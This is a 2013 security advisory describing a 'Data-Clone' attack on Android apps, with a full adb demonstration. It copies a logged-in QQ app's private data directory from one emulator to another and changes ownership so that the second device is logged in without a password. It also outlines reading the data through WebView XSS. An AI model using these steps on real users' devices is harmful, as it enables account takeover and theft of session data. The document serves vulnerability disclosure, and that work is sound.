"Data-Clone" -- a new way to attack android apps Author: SuperHei@www.knownsec.com [Email:5up3rh3i#gmail.com] Release Date: 2013/03/16 Update Date: 2013/03/18 References: http://www.80vul.com/android/data-clone.txt Chinese Version: http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview/ --[ I - Introduction This is a new way to attack android apps t,and i call it "Data-Clone Attack". it can bypass password authentication ,when user login the app and set "remember password"(some apps is define). --[ II - Description let us use a demo to illustrat it , This is a test procedure: 1. open two emulator. >adb devices List of devices attached emulator-5554 device emulator-5556 device both devices install "com.tencent.mobileqq"(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse, you also can use other applications to test. 2. login the app on "emulator-5554" and make sure you choose the "remember password". then pull the app data to your PC >adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:\\aab pull: building file list... pull: /data/data/com.tencent.mobileqq/databases/qcenter.Db -> d:\\aab/databases/qcenter.Db pull: /data/data/com.tencent.mobileqq/databases/*************.db -> d:\\aab/databases/*************.db pull: /data/data/com.tencent.mobileqq/shared_prefs/only.xml -> d:\\aab/shared_prefs/only.xml pull: /data/data/com.tencent.mobileqq/shared_prefs/share.xml -> d:\\aab/shared_prefs/share.xml pull: /data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml -> d:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml pull: /data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml -> d:\\aab/shared_prefs/mobileQQ.xml pull: /data/data/com.tencent.mobileqq/shared_prefs/*************.xml -> d:\\aab/shared_prefs/*************.xml pull: /data/data/com.tencent.mobileqq/files/ADPic/457 -> d:\\aab/files/ADPic/457 pull: /data/data/com.tencent.mobileqq/files/Skin/skinmain.xml -> d:\\aab/files/Skin/skinmain.xml pull: /data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png -> d:\\aab/files/Skin/tab_bg_bar.png pull: /data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml -> d:\\aab/files/Skin/thumbnail_skin.xml pull: /data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png -> d:\\aab/files/Skin/title_bg_bar.png pull: /data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat -> d:\\aab/files/sc/ConfigStore2.dat pull: /data/data/com.tencent.mobileqq/files/ConfigStore2.dat -> d:\\aab/files/ConfigStore2.dat pull: /data/data/com.tencent.mobileqq/files/runningApp -> d:\\aab/files/runningApp pull: /data/data/com.tencent.mobileqq/lib/libamrnb.so -> d:\\aab/lib/libamrnb.so pull: /data/data/com.tencent.mobileqq/lib/libaudiohelper.so -> d:\\aab/lib/libaudiohelper.so pull: /data/data/com.tencent.mobileqq/lib/libcodecwrapper.so -> d:\\aab/lib/libcodecwrapper.so pull: /data/data/com.tencent.mobileqq/lib/libCommon.so -> d:\\aab/lib/libCommon.so pull: /data/data/com.tencent.mobileqq/lib/liblbs.so -> d:\\aab/lib/liblbs.so pull: /data/data/com.tencent.mobileqq/lib/libmsfboot.so -> d:\\aab/lib/libmsfboot.so pull: /data/data/com.tencent.mobileqq/lib/libsnapcore.so -> d:\\aab/lib/libsnapcore.so pull: /data/data/com.tencent.mobileqq/lib/libVideoCtrl.so -> d:\\aab/lib/libVideoCtrl.so 23 files pulled. 0 files skipped. 88 KB/s (4431172 bytes in 49.011s) 3. push the data to "emulator-5556" >adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/ push: D:\\aab/databases/qcenter.Db -> /data/data/com.tencent.mobileqq/databases/qcenter.Db push: D:\\aab/databases/*************.db -> /data/data/com.tencent.mobileqq/databases/*************.db push: D:\\aab/files/ADPic/457 -> /data/data/com.tencent.mobileqq/files/ADPic/457 push: D:\\aab/files/sc/ConfigStore2.dat -> /data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat push: D:\\aab/files/Skin/title_bg_bar.png -> /data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png push: D:\\aab/files/Skin/thumbnail_skin.xml -> /data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml push: D:\\aab/files/Skin/tab_bg_bar.png -> /data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png push: D:\\aab/files/Skin/skinmain.xml -> /data/data/com.tencent.mobileqq/files/Skin/skinmain.xml push: D:\\aab/files/runningApp -> /data/data/com.tencent.mobileqq/files/runningApp push: D:\\aab/files/ConfigStore2.dat -> /data/data/com.tencent.mobileqq/files/ConfigStore2.dat push: D:\\aab/lib/libVideoCtrl.so -> /data/data/com.tencent.mobileqq/lib/libVideoCtrl.so push: D:\\aab/lib/libsnapcore.so -> /data/data/com.tencent.mobileqq/lib/libsnapcore.so push: D:\\aab/lib/libmsfboot.so -> /data/data/com.tencent.mobileqq/lib/libmsfboot.so push: D:\\aab/lib/liblbs.so -> /data/data/com.tencent.mobileqq/lib/liblbs.so push: D:\\aab/lib/libCommon.so -> /data/data/com.tencent.mobileqq/lib/libCommon.so push: D:\\aab/lib/libcodecwrapper.so -> /data/data/com.tencent.mobileqq/lib/libcodecwrapper.so push: D:\\aab/lib/libaudiohelper.so -> /data/data/com.tencent.mobileqq/lib/libaudiohelper.so push: D:\\aab/lib/libamrnb.so -> /data/data/com.tencent.mobileqq/lib/libamrnb.so push: D:\\aab/shared_prefs/share.xml -> /data/data/com.tencent.mobileqq/shared_prefs/share.xml push: D:\\aab/shared_prefs/only.xml -> /data/data/com.tencent.mobileqq/shared_prefs/only.xml push: D:\\aab/shared_prefs/mobileQQ.xml -> /data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml push: D:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml -> /data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml push: D:\\aab/shared_prefs/*************.xml -> /data/data/com.tencent.mobileqq/shared_prefs/*************.xml 23 files pushed. 0 files skipped. 69 KB/s (4431172 bytes in 62.108s) 4. adb-shell to "emulator-5556" >adb -s emulator-5556 shell # ls -l /data/data/ ls -l /data/data/ drwxr-x--x app_1 app_1 2012-09-24 02:43 com.android.htmlviewer .... drwxr-x--x app_35 app_35 2012-12-06 07:17 com.tencent.mobileqq and get the com.tencent.mobileqq owner is “app_35”。 Because push the data is ROOT : # ls -l /data/data/com.tencent.mobileqq ls -l /data/data/com.tencent.mobileqq drwxrwxr-x root root 2012-12-06 07:17 shared_prefs drwxrwxr-x root root 2012-12-06 07:16 databases drwxrwx--x app_35 app_35 2012-12-06 07:10 cache drwxrwx--x app_35 app_35 2012-12-06 07:16 files drwxr-xr-x system system 2012-12-06 07:17 lib so we need to chown : # cd /data/data/com.tencent.mobileqq cd /data/data/com.tencent.mobileqq # chown app_35 * chown app_35 * # ls -l ls -l drwxrwxr-x app_35 root 2012-12-06 07:17 shared_prefs drwxrwxr-x app_35 root 2012-12-06 07:16 databases drwxrwx--x app_35 app_35 2012-12-06 07:10 cache drwxrwx--x app_35 app_35 2012-12-06 07:16 files drwxr-xr-x app_35 system 2012-12-06 07:17 lib 5.open the app on "emulator-5556", and u have login the com.tencent.mobileqq on "emulator-5556". --[ III - How to exploit "How to get the contents of data" is key to the completion of the attack. some like this: 1. Already have super privileges under the root shell like the demo,u can bypass password authentication used "Data-Clone Attack". -----------------------[update (2013/3/18)]This conclusion is wrong!------------------------------ 2. apps install on SDcard the others have read permissions to obtain the app's data. -------------------------------------------------------------------------------------------------- 3. Cross-site scripting on android app + webview + xss(or webkit xcs vul) = "Data-Clone" On older version of android , android app's xss or webkit xcs vul can read the local file's contents : http://www.80vul.com/android/android-0days.txt So the app's webview have the file read permissions to the app's data. when a app user visit a URL link,the data will Be cloned。 --[ IV - Disclosure Timeline 2012/03/ - Found this 2012/12/10 - Report it to security@android.com ......For a long time has passed...... 2013/03/16 - security@android.com do not have any response (maybe,because Google was not andriod's biological mother) 2013/03/16 -Public Disclosure [update (2013/3/18) thx jann Horn(jannhorn@googlemail.com) for pointing out my error!]